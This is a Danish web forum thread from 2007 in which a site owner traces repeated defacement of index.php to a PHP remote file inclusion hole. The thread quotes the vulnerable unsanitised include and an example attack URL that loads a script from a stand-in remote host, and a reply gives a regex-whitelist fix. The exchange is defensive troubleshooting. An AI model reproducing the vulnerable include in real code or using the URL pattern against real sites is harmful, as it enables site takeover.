Avatar billede anri Novice
30. marts 2007 - 08:18 Der er 6 kommentarer og
1 løsning

Hjemmeside bliver hacket

Min kæreste har en hjemmeside liggende på one.com og den er flere gange blevet hacket.

Det er blot et par linier der bliver sat ind i index.php så det er jo let af fikse.

Jeg har ikke meget begreb om PHP og apache så jeg ved ikke om jeg selv skal/kan gør noget for at sikre systemet, eller om det er One.com's ansvar at der ikke er huller..

Nogen kloge input på det område?
Avatar billede bufferzone Praktikant
30. marts 2007 - 08:42 #1
Med stor sansynelighed har hun en eller anden færdig løsning, f.eks. et forum eller et cms system kørende som har en sårbarhed og som ikke er opdateret. Hvis dette er tilfældet, er det jeres problem da hullet ligger i et system i har installeret. Det kan teoretisk også lige i OS og web server og så er det udbyderen, men det er mest sansynligt at det er jeres del
Avatar billede anri Novice
30. marts 2007 - 09:21 #2
Jooh..  Men der er sådan set ikke installeret andet end flade php sider.  den eneste grund til at der ikke er benyttet flade .HTML sider er at jeg har lavet en lille 1-linies php funktion der lægger et logo på alle sider.

..i så fald, hvad skal jeg være obs på, så de ikke kan skrive i min index.php? Det virker jo sært at de kan redigere i den, når de ikke har FTP adgang, så i min verden ligner det et ulukket hul i one.com's server..

..men igen..  Jeg kender intet til PHP/Apache, så jeg kan jo kun blive klogere..
Avatar billede anri Novice
30. marts 2007 - 12:19 #3
Hov..  Der ligger problemet jo..  Jeg har en variabel include et sted lignende det her

<?php include( $page ); ?>

Jeg har en wrapper der lægger logo og layout på alle normale sider, men så kan man kalde det med et eksternt script, som vil blive loadet.
http://www.yourdomain.com/script.php?page=http://remoteserver.com/nastyscript.php

Min umiddelbare løsning vil være at teste om det er en lokal adresse inden jeg includer.

bufferzone får point fordi det ikke var helt hen i vejret, det han sagde.
Avatar billede johan.o Nybegynder
01. april 2007 - 13:17 #4
Ja, du kan teste om det er en lokal adresse, men du kan også fjerne det 'farlige' indhold fra $_GET['page'] variablen.

$page="";
if(preg_match("/^[a-z0-9_\/]+$/", $_GET['page'])) { $page=$_GET['page'].".php"; }

if($page!="") { include($page); }

Så kan page kun indeholde bogstaverne a-z, tallene 0-9, underscore _ og skråstreger /

og derved er det ikke muligt at lave 'cross browser/server' ting. Funktionaliteten kan yderligere udvikles til f.eks. at sende dig en mail hvis nogen skriver noget 'vrøvl' i page variablen så kan du følge med i hvad en evt. 'forbryder' forsøger sig med. Desuden kan du lave en funktionalitet der selv undersøger om det er en .php, .htm, .pdf eller anden type af fil der efterspørges.

Mvh. Johan
Avatar billede anri Novice
15. februar 2009 - 13:00 #5
Hovsa..  Denne har da stået åben et stykke tid..
johan.o, læg et svar, så får du point.
Avatar billede johan.o Nybegynder
15. februar 2009 - 15:16 #6
Kommer her.

Mvh. Johan
Avatar billede johan.o Nybegynder
15. februar 2009 - 15:21 #7
Hm, kommer det som svar eller indlæg??......ikke til at se, skal lige vende mig til det her nye design, har ikke været herinde i et stykke tid.
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Vi tilbyder markedets bedste kurser inden for webudvikling

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester